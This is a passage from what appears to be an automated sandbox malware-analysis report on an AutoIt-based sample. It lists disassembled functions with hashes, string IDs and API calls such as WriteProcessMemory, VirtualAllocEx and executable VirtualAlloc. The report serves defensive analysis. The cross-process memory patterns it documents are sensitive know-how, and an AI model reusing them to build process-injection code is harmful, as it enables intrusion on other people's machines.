                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 584ef262b0ebc5289be6ebea843ba818118413312f4bec15440027875142f145
                    • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                    • Opcode Fuzzy Hash: 584ef262b0ebc5289be6ebea843ba818118413312f4bec15440027875142f145
                    • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                    Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                    Download Yara Rule
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%I
                    • API String ID: 3565006973-4251005282
                    • Opcode ID: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                    • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                    • Opcode Fuzzy Hash: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                    • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                    Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                      • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                    • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                    • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                    • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                    Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: 3cA$_A
                    • API String ID: 4104443479-3480954128
                    • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                    • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                    • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                    • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                    Function 004597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6
                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F
                      • Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1
                      • Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
                      • Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
                      • Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                    • String ID: @
                    • API String ID: 4150878124-2766056989
                    • Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                    • Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
                    • Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                    • Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5
                    Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                    • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                    • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                    • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                    Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                    • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                    • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                    • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                    Function 0048770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                    • Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
                    • Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                    • Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24
                    Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: K$@BL
                    • API String ID: 3494438863-2209178351
                    • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                    • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                    • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                    • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                    Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                    • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                    • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                    • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                    Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                    • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                    • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                    • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                    Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                    • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                    • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                    • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                    Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                    • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                    • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                    • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                    Function 00441714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LocalTime__swprintf
                    • String ID: %.3d$WIN_XPe
                    • API String ID: 2070861257-2409531811
                    • Opcode ID: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                    • Instruction ID: f51e3ac8fae6d8955d529539db48231027d4147bdd6b48c6978ef66e561906ab
                    • Opcode Fuzzy Hash: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                    • Instruction Fuzzy Hash: D2D01271844118FAD7109B9098898F9737CA708301F600563B512A2050E23E9BD6E62E
                    Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                    • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                    • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                    • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                    Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                    • CharLowerBuffW.USER32(?,?), ref: 0047E101
                      • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                    • _memmove.LIBCMT ref: 0047E314
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
